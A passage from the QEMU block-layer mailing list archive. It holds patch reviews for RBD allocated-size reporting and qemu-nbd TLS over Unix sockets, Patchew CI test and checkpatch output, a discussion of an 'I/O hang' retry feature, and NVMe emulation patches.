 qemuio_command_usage(_cmd);
 return -EINVAL;
@@ -1051,8 +1117,9 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 return -EINVAL;
 }
 
-if (zflag && Pflag) {
-printf("-z and -P cannot be specified at the same time\n");
+if ((int)zflag + (int)Pflag + (int)sflag > 1) {
+printf("Only one of -z, -P, and -s"
+   "can be specified at the same time\n");
 return -EINVAL;
 }
 
@@ -1088,7 +1155,14 @@ static int write_f(BlockBackend *blk, int argc, char 
**argv)
 }
 
 if (!zflag) {
-buf = qemu_io_alloc(blk, count, pattern);
+if (sflag) {
+buf = qemu_io_alloc_from_file(blk, count, file_name);
+if (!buf) {
+return -EINVAL;
+}
+} else {

Re: [Qemu-block] [PATCH v3] block/rbd: implement .bdrv_get_allocated_file_size callback

2019-07-05 Thread Max Reitz
On 05.07.19 11:32, Stefano Garzarella wrote:
> This patch allows 'qemu-img info' to show the 'disk size' for
> the RBD images that have the fast-diff feature enabled.
> 
> If this feature is enabled, we use the rbd_diff_iterate2() API
> to calculate the allocated size for the image.
> 
> Signed-off-by: Stefano Garzarella 
> ---
> v3:
>   - return -ENOTSUP instead of -1 when fast-diff is not available
> [John, Jason]
> v2:
>   - calculate the actual usage only if the fast-diff feature is
> enabled [Jason]
> ---
>  block/rbd.c | 54 +
>  1 file changed, 54 insertions(+)

Well, the librbd documentation is non-existing as always, but while
googling, I at least found that libvirt has exactly the same code.  So I
suppose it must be quite correct, then.

> diff --git a/block/rbd.c b/block/rbd.c
> index 59757b3120..b6bed683e5 100644
> --- a/block/rbd.c
> +++ b/block/rbd.c
> @@ -1084,6 +1084,59 @@ static int64_t qemu_rbd_getlength(BlockDriverState *bs)
>  return info.size;
>  }
>  
> +static int rbd_allocated_size_cb(uint64_t offset, size_t len, int exists,
> + void *arg)
> +{
> +int64_t *alloc_size = (int64_t *) arg;
> +
> +if (exists) {
> +(*alloc_size) += len;
> +}
> +
> +return 0;
> +}
> +
> +static int64_t qemu_rbd_get_allocated_file_size(BlockDriverState *bs)
> +{
> +BDRVRBDState *s = bs->opaque;
> +uint64_t flags, features;
> +int64_t alloc_size = 0;
> +int r;
> +
> +r = rbd_get_flags(s->image, &flags);
> +if (r < 0) {
> +return r;
> +}
> +
> +r = rbd_get_features(s->image, &features);
> +if (r < 0) {
> +return r;
> +}
> +
> +/*
> + * We use rbd_diff_iterate2() only if the RBD image have fast-diff
> + * feature enabled. If it is disabled, rbd_diff_iterate2() could be
> + * very slow on a big image.
> + */
> +if (!(features & RBD_FEATURE_FAST_DIFF) ||
> +(flags & RBD_FLAG_FAST_DIFF_INVALID)) {
> +return -ENOTSUP;
> +}
> +
> +/*
> + * rbd_diff_iterate2(), if the source snapshot name is NULL, invokes
> + * the callback on all allocated regions of the image.
> + */
> +r = rbd_diff_iterate2(s->image, NULL, 0,
> +  bs->total_sectors * BDRV_SECTOR_SIZE, 0, 1,
> +  &rbd_allocated_size_cb, &alloc_size);

But I have a question.  This is basically block_status, right?  So it
gives us information on which areas are allocated and which are not.
The result thus gives us a lower bound on the allocation size, but is it
really exactly the allocation size?

There are two things I’m concerned about:

1. What about metadata?

2. If you have multiple snapshots, this will only report the overall
allocation information, right?  So say there is something like this:

(“A” means an allocated MB, “-” is an unallocated MB)

Snapshot 1: AAAAA--
Snapshot 2: --AAAA-
Snapshot 3: ---AAAA

I think the allocated data size is the number of As in total (13 MB).
But I suppose this API will just return 7 MB, because it looks at
everything and sees the whole image range (7 MB) as allocated.  It
doesn’t report in how many snapshots some region is allocated.

Max

> +if (r < 0) {
> +return r;
> +}
> +
> +return alloc_size;
> +}
> +
>  static int coroutine_fn qemu_rbd_co_truncate(BlockDriverState *bs,
>   int64_t offset,
>   PreallocMode prealloc,
> @@ -1291,6 +1344,7 @@ static BlockDriver bdrv_rbd = {
>  .bdrv_get_info  = qemu_rbd_getinfo,
>  .create_opts= _rbd_create_opts,
>  .bdrv_getlength = qemu_rbd_getlength,
> +.bdrv_get_allocated_file_size = qemu_rbd_get_allocated_file_size,
>  .bdrv_co_truncate   = qemu_rbd_co_truncate,
>  .protocol_name  = "rbd",
>  
> 






Re: [Qemu-block] [PATCH v2 RFC] qemu-nbd: Permit TLS with Unix sockets

2019-07-05 Thread Max Reitz
On 04.07.19 00:47, Eric Blake wrote:
> Although you generally won't use encryption with a Unix socket (after
> all, everything is local, so why waste the CPU power), there are
> situations in testsuites where Unix sockets are much nicer than TCP
> sockets.  Since nbdkit allows encryption over both types of sockets,
> it makes sense for qemu-nbd to do likewise.

Hmm.  The code is simple enough, so I don’t see a good reason not to.

> The restriction has been present since its introduction in commits
> 145614a1 and 75822a12 (v2.6), where the former documented the
> limitation but did not provide any additional explanation why it was
> added; but looking closer, it seems the most likely reason is that
> x509 verification requires a hostname. But we can do the same as
> migration did, and add a tls-hostname parameter to supply that
> information.
> 
> Signed-off-by: Eric Blake 
> 
> ---
> 
> Since this is now adding a new qemu-nbd command-line option, as well
> as new QMP for blockdev-add, it has missed 4.1 softfreeze and should
> probably be delayed to 4.2.
> 
> RFC: The test is racy - it sometimes passes, and sometimes fails with:
> 
>  == check TLS with authorization over Unix ==
>  qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> -qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Input/output error
> +qemu-img: Could not open 
> 'driver=nbd,path=SOCKET,tls-creds=tls0,tls-hostname=localhost': Failed to 
> read option reply: Cannot read from TLS channel: Software caused connection 
> abort

Well, the first thing is that over TCP, the reference output shows that
it should indeed fail with ECONNABORTED.  So to me it seems like EIO is
actually the wrong error code.

Um, also, a perhaps stupid question: Why is there no passing test for
client authorization?

> I suspect that there is a bug in the qio TLS channel code when it
> comes to handling a failed TLS handshake, which results in the racy
> output. I'll need help solving that first.  It might also be nice if
> we had a bit more visibility into the gnutls error message when TLS
> handshake fails.

Well, what I can see is that the error code comes from
qcrypto_tls_session_read().  You get ECONNABORTED for
GNUTLS_E_PREMATURE_TERMINATION, and EIO for GNUTLS_E_PULL_ERROR (under
default; but that’s the error that appears if it isn’t
PREMATURE_TERMINATION).

So I suppose you get ECONNABORTED if the first read happens after the
RST is received (or the equivalent on Unix sockets, I have no idea how
they work on the low level); and you get EIO if you try to read before
that (because the TLS connection has just not been established
successfully).

I have experimented a bit, but unfortunately couldn’t find anything to
change the test results in any way... :/

> ---
>  qemu-nbd.texi  |  3 ++
>  qapi/block-core.json   |  5 ++
>  block/nbd.c| 27 +--
>  qemu-nbd.c | 26 ---
>  tests/qemu-iotests/233 | 94 --
>  tests/qemu-iotests/233.out | 61 +++--
>  tests/qemu-iotests/group   |  2 +-
>  7 files changed, 198 insertions(+), 20 deletions(-)
> 
> diff --git a/qemu-nbd.texi b/qemu-nbd.texi
> index 7f55657722bd..764518baef84 100644
> --- a/qemu-nbd.texi
> +++ b/qemu-nbd.texi
> @@ -123,6 +123,9 @@ Store the server's process ID in the given file.
>  Specify the ID of a qauthz object previously created with the
>  --object option. This will be used to authorize connecting users
>  against their x509 distinguished name.
> +@item --tls-hostname=NAME
> +When using list mode with TLS over a Unix socket, supply the hostname
> +to use during validation of the server's x509 certificate.
>  @item -v, --verbose
>  Display extra debugging information.
>  @item -h, --help

qemu-nbd.c has some parameter documentation, too.  Maybe this option
should be listed there.

> diff --git a/qapi/block-core.json b/qapi/block-core.json
> index 0d43d4f37c1a..95da0d44c220 100644
> --- a/qapi/block-core.json
> +++ b/qapi/block-core.json
> @@ -3856,6 +3856,10 @@
>  #
>  # @tls-creds:   TLS credentials ID
>  #
> +# @tls-hostname: Hostname of the server, required only when using x509 based
> +#TLS credentials when @server lacks a hostname (such as
> +#using a Unix socket). (Since 4.1)

Well, 4.2 now.

> +#
>  # @x-dirty-bitmap: A "qemu:dirty-bitmap:NAME" string to query in place of
>  #  traditional "base:allocation" block status (see
>  #  NBD_OPT_LIST_META_CONTEXT in the NBD protocol) (since 3.0)

[...]

> diff --git a/block/nbd.c b/block/nbd.c
> index 81edabbf35ed..ce3db21190ce 100644
> --- a/block/nbd.c
> +++ b/block/nbd.c

[...]

> @@ -1624,12 +1629,25 @@ static int nbd_open(BlockDriverState 

Re: [Qemu-block] [Qemu-devel] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple namespaces

2019-07-05 Thread no-reply
Patchew URL: https://patchew.org/QEMU/20190705072333.17171-1-kl...@birkelund.eu/



Hi,

This series failed the asan build test. Please find the testing commands and
their output below. If you have Docker installed, you can probably reproduce it
locally.

=== TEST SCRIPT BEGIN ===
#!/bin/bash
make docker-image-fedora V=1 NETWORK=1
time make docker-test-debug@fedora TARGET_LIST=x86_64-softmmu J=14 NETWORK=1
=== TEST SCRIPT END ===

PASS 1 fdc-test /x86_64/fdc/cmos
PASS 2 fdc-test /x86_64/fdc/no_media_on_start
PASS 3 fdc-test /x86_64/fdc/read_without_media
==7866==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 4 fdc-test /x86_64/fdc/media_change
PASS 5 fdc-test /x86_64/fdc/sense_interrupt
PASS 6 fdc-test /x86_64/fdc/relative_seek
---
PASS 32 test-opts-visitor /visitor/opts/range/beyond
PASS 33 test-opts-visitor /visitor/opts/dict/unvisited
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-coroutine -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="test-coroutine" 
==7910==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
==7910==WARNING: ASan is ignoring requested __asan_handle_no_return: stack top: 
0x7ffe02725000; bottom 0x7fcded0f8000; size: 0x00301562d000 (206517227520)
False positive error reports may follow
For details see https://github.com/google/sanitizers/issues/189
PASS 1 test-coroutine /basic/no-dangling-access
---
PASS 11 test-aio /aio/event/wait
PASS 12 test-aio /aio/event/flush
PASS 13 test-aio /aio/event/wait/no-flush-cb
==7926==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 14 test-aio /aio/timer/schedule
PASS 15 test-aio /aio/coroutine/queue-chaining
PASS 16 test-aio /aio-gsource/flush
---
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-aio-multithread -m=quick -k --tap < /dev/null | 
./scripts/tap-driver.pl --test-name="test-aio-multithread" 
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
QTEST_QEMU_BINARY=x86_64-softmmu/qemu-system-x86_64 QTEST_QEMU_IMG=qemu-img 
tests/ide-test -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="ide-test" 
PASS 1 test-aio-multithread /aio/multi/lifecycle
==7934==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
==7950==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 2 test-aio-multithread /aio/multi/schedule
PASS 1 ide-test /x86_64/ide/identify
==7961==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 3 test-aio-multithread /aio/multi/mutex/contended
PASS 2 ide-test /x86_64/ide/flush
==7972==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 3 ide-test /x86_64/ide/bmdma/simple_rw
==7978==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 4 test-aio-multithread /aio/multi/mutex/handoff
PASS 4 ide-test /x86_64/ide/bmdma/trim
==7989==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 5 test-aio-multithread /aio/multi/mutex/mcs
PASS 5 ide-test /x86_64/ide/bmdma/short_prdt
==8000==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 6 test-aio-multithread /aio/multi/mutex/pthread
PASS 6 ide-test /x86_64/ide/bmdma/one_sector_short_prdt
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-throttle -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="test-throttle" 
---
PASS 3 test-throttle /throttle/init
PASS 4 test-throttle /throttle/destroy
PASS 5 test-throttle /throttle/have_timer
==8009==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 6 test-throttle /throttle/detach_attach
PASS 7 test-throttle /throttle/config_functions
PASS 8 test-throttle /throttle/accounting
---
PASS 14 test-throttle /throttle/config/max
PASS 15 test-throttle /throttle/config/iops_size
MALLOC_PERTURB_=${MALLOC_PERTURB_:-$(( ${RANDOM:-0} % 255 + 1))}  
tests/test-thread-pool -m=quick -k --tap < /dev/null | ./scripts/tap-driver.pl 
--test-name="test-thread-pool" 
==8007==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
==8017==WARNING: ASan doesn't fully support makecontext/swapcontext functions 
and may produce false positives in some cases!
PASS 1 test-thread-pool /thread-pool/submit
PASS 2 test-thread-pool /thread-pool/submit-aio
PASS 3 test-thread-pool /thread-pool/submit-co
PASS 

Re: [Qemu-block] [Qemu-devel] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple namespaces

2019-07-05 Thread no-reply
Patchew URL: https://patchew.org/QEMU/20190705072333.17171-1-kl...@birkelund.eu/



Hi,

This series seems to have some coding style problems. See output below for
more information:

Type: series
Subject: [Qemu-devel] [PATCH 00/16] nvme: support NVMe v1.3d, SGLs and multiple 
namespaces
Message-id: 20190705072333.17171-1-kl...@birkelund.eu

=== TEST SCRIPT BEGIN ===
#!/bin/bash
git rev-parse base > /dev/null || exit 0
git config --local diff.renamelimit 0
git config --local diff.renames True
git config --local diff.algorithm histogram
./scripts/checkpatch.pl --mailback base..
=== TEST SCRIPT END ===

Switched to a new branch 'test'
aed82e6 nvme: support multiple namespaces
124aba5 nvme: support scatter gather lists
87ed485 nvme: support multiple block requests per request
a093729 nvme: simplify dma/cmb mappings
476911f nvme: bump supported NVMe revision to 1.3d
5856e28 nvme: add missing mandatory Features
c1555e1 nvme: support Get Log Page command
36411fc nvme: support Asynchronous Event Request command
c27295f nvme: refactor device realization
9b85297 nvme: support Abort command
b4752ee nvme: support completion queue in cmb
cecb502 nvme: populate the mandatory subnqn and ver fields
01283a3 nvme: add missing fields in identify controller
c8dcb3f nvme: fix lpa field
4515446 nvme: move device parameters to separate struct
9f1a140 nvme: simplify namespace code

=== OUTPUT BEGIN ===
1/16 Checking commit 9f1a1408cc38 (nvme: simplify namespace code)
2/16 Checking commit 451544667fc8 (nvme: move device parameters to separate 
struct)
ERROR: Macros with complex values should be enclosed in parenthesis
#204: FILE: hw/block/nvme.h:6:
+#define DEFINE_NVME_PROPERTIES(_state, _props) \
+DEFINE_PROP_STRING("serial", _state, _props.serial), \
+DEFINE_PROP_UINT32("cmb_size_mb", _state, _props.cmb_size_mb, 0), \
+DEFINE_PROP_UINT32("num_queues", _state, _props.num_queues, 64)

total: 1 errors, 0 warnings, 205 lines checked

Patch 2/16 has style problems, please review.  If any of these errors
are false positives report them to the maintainer, see
CHECKPATCH in MAINTAINERS.

3/16 Checking commit c8dcb3f63fb7 (nvme: fix lpa field)
4/16 Checking commit 01283a3975d7 (nvme: add missing fields in identify 
controller)
5/16 Checking commit cecb50298f9f (nvme: populate the mandatory subnqn and ver 
fields)
6/16 Checking commit b4752eecf9e1 (nvme: support completion queue in cmb)
7/16 Checking commit 9b8529736294 (nvme: support Abort command)
8/16 Checking commit c27295f1ea55 (nvme: refactor device realization)
9/16 Checking commit 36411fcd1a67 (nvme: support Asynchronous Event Request 
command)
10/16 Checking commit c1555e1835da (nvme: support Get Log Page command)
11/16 Checking commit 5856e2876e3c (nvme: add missing mandatory Features)
12/16 Checking commit 476911f6ca42 (nvme: bump supported NVMe revision to 1.3d)
13/16 Checking commit a093729af080 (nvme: simplify dma/cmb mappings)
14/16 Checking commit 87ed48569f6f (nvme: support multiple block requests per 
request)
15/16 Checking commit 124aba558277 (nvme: support scatter gather lists)
16/16 Checking commit aed82e6e8f62 (nvme: support multiple namespaces)
WARNING: added, moved or deleted file(s), does MAINTAINERS need updating?
#39: 
new file mode 100644

total: 0 errors, 1 warnings, 631 lines checked

Patch 16/16 has style problems, please review.  If any of these errors
are false positives report them to the maintainer, see
CHECKPATCH in MAINTAINERS.
=== OUTPUT END ===

Test command exited with code: 1


The full log is available at
http://patchew.org/logs/20190705072333.17171-1-kl...@birkelund.eu/testing.checkpatch/?type=message.
---
Email generated automatically by Patchew [https://patchew.org/].
Please send your feedback to patchew-de...@redhat.com

Re: [Qemu-block] question:about introduce a new feature named “I/O hang”

2019-07-05 Thread Kevin Wolf
Am 04.07.2019 um 17:16 hat wangjie (P) geschrieben:
> Hi, everybody:
> 
> I developed a feature named "I/O hang"; my intention is to solve the
> following problem:
> If the backend storage of a VM disk is remote storage such as IP SAN or
> FC SAN, the storage network link can drop from time to time, which makes
> I/O requests return EIO to the guest and leaves the guest filesystem
> read-only. Even after the link recovers, the filesystem in the guest
> does not recover.

The standard solution for this is configuring the guest device with
werror=stop,rerror=stop so that the error is not delivered to the guest,
but the VM is stopped. When you run 'cont', the request is then retried.
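
For example (illustrative only, the backing file path is made up):

  -drive file=/dev/mapper/san-lun0,format=raw,if=none,id=disk0,werror=stop,rerror=stop
  -device virtio-blk-pci,drive=disk0

On an I/O error the VM pauses and a BLOCK_IO_ERROR event is emitted; once
the link is back, 'cont' resumes the guest and the failed request is
retried transparently.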

> So I developed a feature named "I/O hang" to solve this problem. The
> solution works like this:
> When an I/O request returns EIO from the backend, "I/O hang" catches the
> request in the qemu block layer and inserts it into a rehandle queue
> instead of returning EIO to the guest. The I/O request hangs in the
> guest, but this does not make the guest filesystem read-only. "I/O hang"
> then periodically (e.g. every 5 seconds) retries the queued requests
> until they stop returning EIO (i.e. the backend storage link has
> recovered).

Letting requests hang without stopping the VM risks the guest running
into timeouts and deciding that its disk is broken.

As you say your "hang" and retry logic sits in the block layer, what do
you do when you encounter a bdrv_drain() request?

> In addition to the above, "I/O hang" can also send an event to libvirt
> when the backend storage status changes.
> 
> Configuration:
> 1. The "I/O hang" ability can be configured per disk as a disk attribute.
> 2. An "I/O hang" timeout can also be configured per disk; if the storage
>    link does not recover within the timeout, "I/O hang" stops rehandling
>    I/O requests and returns EIO to the guest.
> 
> Are you interested in this feature?  I intend to submit it to the qemu
> project; what's your opinion?

Were you aware of werror/rerror? Before we add another mechanism, we
need to be sure how the features compare, that the new mechanism
provides a significant advantage and that we keep code duplication as
low as possible.

Kevin



Re: [Qemu-block] [RFC,v1] Namespace Management Support

2019-07-05 Thread Klaus Birkelund
On Tue, Jul 02, 2019 at 10:39:36AM -0700, Matt Fitzpatrick wrote:
> Adding namespace management support to the nvme device. Namespace creation
> requires contiguous block space for a simple method of allocation.
> 
> I wrote this a few years ago based on Keith's fork and nvmeqemu fork and
> have recently re-synced with the latest trunk.  Some data structures in
> nvme.h are a bit more filled out than strictly necessary, as this is also
> the base for sr-iov and IOD patches to be submitted later.
> 

Hi Matt,

Nice! I'm always happy when new features for the nvme device are posted!

I'll be happy to review it, but I won't start going through it in
detail because I believe the approach to supporting multiple namespaces
is flawed. We had a recent discussion on this and I also got some
unrelated patches rejected due to implementing it similarly by carving
up the image.

I have posted a long series that includes a patch for multiple
namespaces. It is implemented by introducing a fresh `nvme-ns` device
model that represents a namespace and attaches to a bus created by the
parent `nvme` controller device.

The core issue is that a qemu image /should/ be attachable to other
devices (say ide) and not strictly tied to the one device model. Thus,
we cannot just shove a bunch of namespaces into a single image.

But, in light of your patch, I'm not convinced that my implementation is
the correct solution. Maybe the abstraction should not be an `nvme-ns`
device, but a `nvme-nvm` device that when attached changes TNVMCAP and
UNVMCAP? Maybe you have some input for this? Or we could have both and
dynamically create the nvme-ns devices on top of nvme-nvm devices. I
think it would still require a 1-to-1 mapping, but it could be a way to
support the namespace management capability.
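
Purely as illustration (the nvme-nvm device name is invented here, nothing
like it exists today), such a stacking could end up looking like:

  -drive file=nvm0.img,if=none,id=nvm0
  -device nvme,serial=deadbeef,id=nvme0
  -device nvme-nvm,drive=nvm0,bus=nvme0

where attaching the nvme-nvm device raises TNVMCAP/UNVMCAP and namespaces
are then either carved out of it at runtime via the Namespace Management
command or declared statically with nvme-ns devices on top.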


Cheers,
Klaus



[Qemu-block] [PATCH 12/16] nvme: bump supported NVMe revision to 1.3d

2019-07-05 Thread Klaus Birkelund Jensen
Add the new Namespace Identification Descriptor List (CNS 03h) and track
creation of queues to enable the controller to return Command Sequence
Error if Set Features is called for Number of Queues after any queues
have been created.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 84 ---
 hw/block/nvme.h   |  1 +
 hw/block/trace-events |  4 ++-
 include/block/nvme.h  | 30 +---
 4 files changed, 102 insertions(+), 17 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 8259dd7c1d6c..8ad95fdfa261 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -9,20 +9,22 @@
  */
 
 /**
- * Reference Specs: http://www.nvmexpress.org, 1.2, 1.1, 1.0e
+ * Reference Specs: http://www.nvmexpress.org, 1.3d, 1.2, 1.1, 1.0e
  *
  *  http://www.nvmexpress.org/resources/
  */
 
 /**
  * Usage: add options:
- *  -drive file=,if=none,id=
- *  -device nvme,drive=,serial=,id=, \
- *  cmb_size_mb=, \
- *  num_queues=
+ * -drive file=,if=none,id=
+ * -device nvme,drive=,serial=,id=
  *
- * Note cmb_size_mb denotes size of CMB in MB. CMB is assumed to be at
- * offset 0 in BAR2 and supports only WDS, RDS and SQS for now.
+ * Advanced optional options:
+ *
+ *   num_queues=  : Maximum number of IO Queues.
+ *  Default: 64
+ *   cmb_size_mb= : Size of Controller Memory Buffer in MBs.
+ *  Default: 0 (disabled)
  */
 
 #include "qemu/osdep.h"
@@ -43,6 +45,7 @@
 #define NVME_ELPE 3
 #define NVME_AERL 3
 #define NVME_OP_ABORTED 0xff
+
 #define NVME_GUEST_ERR(trace, fmt, ...) \
 do { \
 (trace_##trace)(__VA_ARGS__); \
@@ -316,6 +319,8 @@ static void nvme_post_cqes(void *opaque)
 static void nvme_enqueue_req_completion(NvmeCQueue *cq, NvmeRequest *req)
 {
 assert(cq->cqid == req->sq->cqid);
+
+trace_nvme_enqueue_req_completion(req->cqe.cid, cq->cqid);
 QTAILQ_REMOVE(&req->sq->out_req_list, req, entry);
 QTAILQ_INSERT_TAIL(&cq->req_list, req, entry);
 timer_mod(cq->timer, qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL) + 500);
@@ -534,6 +539,7 @@ static void nvme_free_sq(NvmeSQueue *sq, NvmeCtrl *n)
 if (sq->sqid) {
 g_free(sq);
 }
+n->qs_created--;
 }
 
 static uint16_t nvme_del_sq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -600,6 +606,7 @@ static void nvme_init_sq(NvmeSQueue *sq, NvmeCtrl *n, 
uint64_t dma_addr,
 cq = n->cq[cqid];
 QTAILQ_INSERT_TAIL(&(cq->sq_list), sq, entry);
 n->sq[sqid] = sq;
+n->qs_created++;
 }
 
 static uint16_t nvme_create_sq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -649,6 +656,7 @@ static void nvme_free_cq(NvmeCQueue *cq, NvmeCtrl *n)
 if (cq->cqid) {
 g_free(cq);
 }
+n->qs_created--;
 }
 
 static uint16_t nvme_del_cq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -689,6 +697,7 @@ static void nvme_init_cq(NvmeCQueue *cq, NvmeCtrl *n, 
uint64_t dma_addr,
 msix_vector_use(&n->parent_obj, cq->vector);
 n->cq[cqid] = cq;
 cq->timer = timer_new_ns(QEMU_CLOCK_VIRTUAL, nvme_post_cqes, cq);
+n->qs_created++;
 }
 
 static uint16_t nvme_create_cq(NvmeCtrl *n, NvmeCmd *cmd)
@@ -762,7 +771,7 @@ static uint16_t nvme_identify_ns(NvmeCtrl *n, NvmeIdentify 
*c)
 prp1, prp2);
 }
 
-static uint16_t nvme_identify_nslist(NvmeCtrl *n, NvmeIdentify *c)
+static uint16_t nvme_identify_ns_list(NvmeCtrl *n, NvmeIdentify *c)
 {
 static const int data_len = 4 * KiB;
 uint32_t min_nsid = le32_to_cpu(c->nsid);
@@ -772,7 +781,7 @@ static uint16_t nvme_identify_nslist(NvmeCtrl *n, 
NvmeIdentify *c)
 uint16_t ret;
 int i, j = 0;
 
-trace_nvme_identify_nslist(min_nsid);
+trace_nvme_identify_ns_list(min_nsid);
 
 list = g_malloc0(data_len);
 for (i = 0; i < n->num_namespaces; i++) {
@@ -789,6 +798,47 @@ static uint16_t nvme_identify_nslist(NvmeCtrl *n, 
NvmeIdentify *c)
 return ret;
 }
 
+static uint16_t nvme_identify_ns_descriptor_list(NvmeCtrl *n, NvmeCmd *c)
+{
+static const int data_len = 4 * KiB;
+
+/*
+ * The device model does not have anywhere to store a persistent UUID, so
+ * conjure up something that is reproducible. We generate an UUID of the
+ * form "----", where nsid is similar to, say,
+ * 0001.
+ */
+struct ns_descr {
+uint8_t nidt;
+uint8_t nidl;
+uint8_t rsvd[14];
+uint32_t nid;
+};
+
+uint32_t nsid = le32_to_cpu(c->nsid);
+uint64_t prp1 = le64_to_cpu(c->prp1);
+uint64_t prp2 = le64_to_cpu(c->prp2);
+
+struct ns_descr *list;
+uint16_t ret;
+
+trace_nvme_identify_ns_descriptor_list(nsid);
+
+if (unlikely(nsid == 0 || nsid > n->num_namespaces)) {
+trace_nvme_err_invalid_ns(nsid, n->num_namespaces);
+return NVME_INVALID_NSID | NVME_DNR;
+}
+
+list = g_malloc0(data_len);
+list->nidt = 0x3;
+list->nidl = 0x10;
+list->nid = cpu_to_be32(nsid);
+
+ret = nvme_dma_read_prp(n, (uint8_t *) list, data_len, 

[Qemu-block] [PATCH 14/16] nvme: support multiple block requests per request

2019-07-05 Thread Klaus Birkelund Jensen
Currently, the device only issues a single block backend request per
NVMe request, but as we move towards supporting metadata (and
discontiguous vector requests supported by OpenChannel 2.0) it will be
required to issue multiple block backend requests per NVMe request.

With this patch the NVMe device is ready for that.

Signed-off-by: Klaus Birkelund Jensen 
---
 hw/block/nvme.c   | 322 --
 hw/block/nvme.h   |  49 +--
 hw/block/trace-events |   3 +
 3 files changed, 290 insertions(+), 84 deletions(-)

diff --git a/hw/block/nvme.c b/hw/block/nvme.c
index 02888dbfdbc1..b285119fd29a 100644
--- a/hw/block/nvme.c
+++ b/hw/block/nvme.c
@@ -25,6 +25,8 @@
  *  Default: 64
  *   cmb_size_mb= : Size of Controller Memory Buffer in MBs.
  *  Default: 0 (disabled)
+ *   mdts= : Maximum Data Transfer Size (power of two)
+ *  Default: 7
  */
 
 #include "qemu/osdep.h"
@@ -319,10 +321,9 @@ static uint16_t nvme_dma_write_prp(NvmeCtrl *n, uint8_t 
*ptr, uint32_t len,
 static uint16_t nvme_dma_read_prp(NvmeCtrl *n, uint8_t *ptr, uint32_t len,
 uint64_t prp1, uint64_t prp2, NvmeRequest *req)
 {
-QEMUSGList qsg;
 uint16_t err = NVME_SUCCESS;
 
-err = nvme_map_prp(n, &qsg, prp1, prp2, len, req);
+err = nvme_map_prp(n, &req->qsg, prp1, prp2, len, req);
 if (err) {
 return err;
 }
@@ -330,8 +331,8 @@ static uint16_t nvme_dma_read_prp(NvmeCtrl *n, uint8_t 
*ptr, uint32_t len,
 if (req->is_cmb) {
 QEMUIOVector iov;
 
-qemu_iovec_init(&iov, qsg.nsg);
-dma_to_cmb(n, &qsg, &iov);
+qemu_iovec_init(&iov, req->qsg.nsg);
+dma_to_cmb(n, &req->qsg, &iov);
 
 if (unlikely(qemu_iovec_from_buf(&iov, 0, ptr, len) != len)) {
 trace_nvme_err_invalid_dma();
@@ -343,17 +344,86 @@ static uint16_t nvme_dma_read_prp(NvmeCtrl *n, uint8_t 
*ptr, uint32_t len,
 goto out;
 }
 
-if (unlikely(dma_buf_read(ptr, len, &qsg))) {
+if (unlikely(dma_buf_read(ptr, len, &req->qsg))) {
 trace_nvme_err_invalid_dma();
 err = NVME_INVALID_FIELD | NVME_DNR;
 }
 
 out:
-qemu_sglist_destroy(&qsg);
+qemu_sglist_destroy(&req->qsg);
 
 return err;
 }
 
+static void nvme_blk_req_destroy(NvmeBlockBackendRequest *blk_req)
+{
+if (blk_req->iov.nalloc) {
+qemu_iovec_destroy(&blk_req->iov);
+}
+
+g_free(blk_req);
+}
+
+static void nvme_blk_req_put(NvmeCtrl *n, NvmeBlockBackendRequest *blk_req)
+{
+nvme_blk_req_destroy(blk_req);
+}
+
+static NvmeBlockBackendRequest *nvme_blk_req_get(NvmeCtrl *n, NvmeRequest *req,
+QEMUSGList *qsg)
+{
+NvmeBlockBackendRequest *blk_req = g_malloc0(sizeof(*blk_req));
+
+blk_req->req = req;
+
+if (qsg) {
+blk_req->qsg = qsg;
+}
+
+return blk_req;
+}
+
+static uint16_t nvme_blk_setup(NvmeCtrl *n, NvmeNamespace *ns, QEMUSGList *qsg,
+NvmeRequest *req)
+{
+NvmeBlockBackendRequest *blk_req = nvme_blk_req_get(n, req, qsg);
+if (!blk_req) {
+NVME_GUEST_ERR(nvme_err_internal_dev_error, "nvme_blk_req_get: %s",
+"could not allocate memory");
+return NVME_INTERNAL_DEV_ERROR;
+}
+
+blk_req->slba = req->slba;
+blk_req->nlb = req->nlb;
